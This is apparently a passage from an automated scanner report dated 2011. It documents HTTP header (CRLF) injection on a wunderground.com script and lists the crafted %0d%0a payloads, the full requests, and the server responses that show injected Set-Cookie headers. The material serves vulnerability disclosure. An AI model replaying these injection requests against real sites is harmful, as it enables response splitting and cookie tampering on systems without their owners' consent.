HTTP/1.1 500 Internal Server Error Date: Sun, 20 Mar 2011 13:31:36 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" OAS_DE_ERROR: Cannot convert 'c5712 3c8b5d6e8a7' to bool. request to 'network.realmedia.com' for '/RealMedia/ads/adstream.cap/574659390', referer 'http://redcated/APM/iview/142856443/direct;wi.300;hi.250/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014700000000000000000/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1/relocate=', handler 'cap-add' Content-Length: 621 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 05:22:14 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>500 Internal Server Error</title> </head><body> <h1>Internal Server Error</h1> <p>The server encountered an internal error or mis ...[SNIP]...
The value of the id request parameter is copied into the Set-Cookie response header. The payload 7d212%0d%0a1bcc71500d5 was submitted in the id parameter. This caused a response containing an injected HTTP header.
Request
GET /dotunset.php?id=7d212%0d%0a1bcc71500d5 HTTP/1.1 Host: www.wunderground.com Proxy-Connection: keep-alive Referer: http://usweb.dotomi.com/renderer/delPublishersCookies.html?pid=13200&rurl=http%3A%2F%2Fads.dotomi.com%2Fads.php%3Fpid%3D13200%26mtg%3D0%26ms%3D11%26btg%3D1%26mp%3D1%26dres%3Diframe%26rwidth%3D300%26rheight%3D250%26pp%3D0%26cg%3D2084%26tz%3D300&u=WH9qYVd2Q3FGAWJeBgV%2BWQlbaXsQfgZCDFxlX1ZL&mpc=0&p=13200&pcg=2084&cg=2084&o=2084 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 13:21:02 GMT Server: Apache/1.3.33 (Unix) PHP/4.4.0 X-Powered-By: PHP/4.4.0 Set-Cookie: dottag.7d212 1bcc71500d5=1; expires=Sun, 20 Mar 2011 13:21:01 GMT; path=/; domain=.wunderground.com Expires: Wed, 11 Nov 1998 11:11:11 GMT Cache-Control: must-revalidate Connection: close Content-Type: image/gif Content-Length: 43
GIF89a.............!.......,...........D..
1.50. http://www.wunderground.com/dotunset.php [name of an arbitrarily supplied request parameter]previous
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wunderground.com
Path:
/dotunset.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Set-Cookie response header. The payload 5e99f%0d%0a4178bf0618c was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /dotunset.php?id=/5e99f%0d%0a4178bf0618c2084 HTTP/1.1 Host: www.wunderground.com Proxy-Connection: keep-alive Referer: http://usweb.dotomi.com/renderer/delPublishersCookies.html?pid=13200&rurl=http%3A%2F%2Fads.dotomi.com%2Fads.php%3Fpid%3D13200%26mtg%3D0%26ms%3D11%26btg%3D1%26mp%3D1%26dres%3Diframe%26rwidth%3D300%26rheight%3D250%26pp%3D0%26cg%3D2084%26tz%3D300&u=WH9qYVd2Q3FGAWJeBgV%2BWQlbaXsQfgZCDFxlX1ZL&mpc=0&p=13200&pcg=2084&cg=2084&o=2084 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 13:21:11 GMT Server: Apache/1.3.33 (Unix) PHP/4.4.0 X-Powered-By: PHP/4.4.0 Set-Cookie: dottag./5e99f 4178bf0618c2084=1; expires=Sun, 20 Mar 2011 13:21:10 GMT; path=/; domain=.wunderground.com Expires: Wed, 11 Nov 1998 11:11:11 GMT Cache-Control: must-revalidate Connection: close Content-Type: image/gif Content-Length: 43
GIF89a.............!.......,...........D..
Report generated by XSS.CX at Sun Mar 20 09:23:19 CDT 2011.